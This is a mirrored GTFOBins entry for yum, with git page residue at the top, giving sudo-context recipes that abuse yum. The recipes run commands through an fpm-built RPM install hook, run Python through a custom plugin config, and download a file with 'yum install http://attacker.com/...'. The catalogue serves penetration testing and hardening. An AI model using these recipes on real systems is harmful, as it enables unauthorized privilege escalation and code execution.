mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 06:31:33 +01:00
450efe76d4
Rationale being that: - it's easy to just forget it; - entries that only have the unprivileged context are quite rare.
52 lines
1.3 KiB
Plaintext
52 lines
1.3 KiB
Plaintext
---
|
|
functions:
|
|
command:
|
|
- code: |-
|
|
yum localinstall -y x-1.0-1.noarch.rpm
|
|
comment: |-
|
|
Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
|
|
|
|
```
|
|
echo /path/to/command >x.sh
|
|
fpm -n x -s dir -t rpm -a all --before-install .x.sh .
|
|
```
|
|
contexts:
|
|
sudo:
|
|
download:
|
|
- code: |-
|
|
yum install http://attacker.com/path/to/input-file.rpm
|
|
comment: |-
|
|
The file on the remote host must have the `.rpm` extension, but the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp/yum-root-xxxxxx/`.
|
|
contexts:
|
|
sudo:
|
|
sender: http-server
|
|
inherit:
|
|
- code: |-
|
|
cat >/path/to/temp-dir/x<<EOF
|
|
[main]
|
|
plugins=1
|
|
pluginpath=/path/to/temp-dir/
|
|
pluginconfpath=/path/to/temp-dir/
|
|
EOF
|
|
|
|
cat >/path/to/temp-dir/y.conf<<EOF
|
|
[main]
|
|
enabled=1
|
|
EOF
|
|
|
|
cat >/path/to/temp-dir/y.py<<EOF
|
|
import yum
|
|
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
|
|
requires_api_version='2.1'
|
|
def init_hook(conduit):
|
|
...
|
|
EOF
|
|
|
|
yum -c /path/to/temp-dir/x --enableplugin=y
|
|
comment: |-
|
|
This allows to run Python code (`...`).
|
|
contexts:
|
|
sudo:
|
|
from: python
|
|
...
|